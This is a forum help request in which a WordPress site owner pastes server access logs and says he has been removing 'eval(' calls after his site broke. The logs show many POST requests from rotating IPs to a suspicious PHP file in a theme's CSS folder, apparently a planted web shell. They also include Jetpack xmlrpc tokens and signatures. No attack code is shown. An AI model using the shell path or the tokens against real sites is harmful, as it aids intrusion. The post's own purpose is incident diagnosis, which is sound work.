162.158.178.13 - - [13/Feb/2017:14:18:24 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:19:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.128 - - [13/Feb/2017:14:19:17 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
172.68.25.74 - - [13/Feb/2017:14:19:39 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:20:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.140 - - [13/Feb/2017:14:20:15 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:21:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:22:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:22:39 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
188.114.110.248 - - [13/Feb/2017:14:22:45 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
108.162.241.86 - - [13/Feb/2017:14:22:50 -0500] "GET /2016/the-count-of-monte-cristo-dumas/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0"
162.158.178.13 - - [13/Feb/2017:14:23:07 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:09 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:13 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:23:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:23:18 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.179.8 - - [13/Feb/2017:14:23:23 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:23 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.179.8 - - [13/Feb/2017:14:23:24 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
172.68.65.76 - - [13/Feb/2017:14:23:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:24:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.215.212 - - [13/Feb/2017:14:24:43 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:25:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:26:06 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:26:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.2.98 - - [13/Feb/2017:14:26:19 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
172.68.10.62 - - [13/Feb/2017:14:26:38 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.215.134 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D" "Jetpack by WordPress.com"
162.158.59.104 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014004&nonce=B0cgAL9GGS&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=IkJ9L25l79us0D58YqTDfYiwUFw%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014004&nonce=B0cgAL9GGS&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=IkJ9L25l79us0D58YqTDfYiwUFw%3D" "Jetpack by WordPress.com"
162.158.62.103 - - [13/Feb/2017:14:26:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:27:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:27:25 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
172.68.46.63 - - [13/Feb/2017:14:27:27 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014046&nonce=ovkH9MfFtP&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=4mILsx6OkCay0cGLC7zCYTGNo6E%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014046&nonce=ovkH9MfFtP&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=4mILsx6OkCay0cGLC7zCYTGNo6E%3D" "Jetpack by WordPress.com"
108.162.215.134 - - [13/Feb/2017:14:27:29 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014049&nonce=ys8p2VhQQN&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=%2FQYFP9Mwy3kMdVnWfxJ0tPHxLH0%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014049&nonce=ys8p2VhQQN&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=%2FQYFP9Mwy3kMdVnWfxJ0tPHxLH0%3D" "Jetpack by WordPress.com"
162.158.59.236 - - [13/Feb/2017:14:27:30 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014050&nonce=cCdWRI6I43&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=HhSeT1rVmC76XtRnuWoLFNWI2%2FU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014050&nonce=cCdWRI6I43&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=HhSeT1rVmC76XtRnuWoLFNWI2%2FU%3D" "Jetpack by WordPress.com"
162.158.78.44 - - [13/Feb/2017:14:27:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:28:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:29:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.237.20 - - [13/Feb/2017:14:29:38 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
172.68.51.152 - - [13/Feb/2017:14:29:46 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:30:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.242 - - [13/Feb/2017:14:30:19 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:31:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:31:19 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:32:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:32:40 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:32:43 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.78.44 - - [13/Feb/2017:14:32:43 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.179.218 - - [13/Feb/2017:14:32:53 -0500] "GET /feed/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806"
162.158.178.13 - - [13/Feb/2017:14:32:59 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:04 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:06 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:33:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
141.101.80.200 - - [13/Feb/2017:14:33:16 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:20 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.22.188 - - [13/Feb/2017:14:33:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:34:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.102.200 - - [13/Feb/2017:14:34:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.215.212 - - [13/Feb/2017:14:34:40 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:35:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:36:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.143.250 - - [13/Feb/2017:14:36:48 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.59.128 - - [13/Feb/2017:14:36:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
At the moment I have been going through and removing all the ‘eval(’s to get my site working again, but this is hardly a long term solution. Need some help getting this fixed.
Cheers,
Sebastian
These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.
×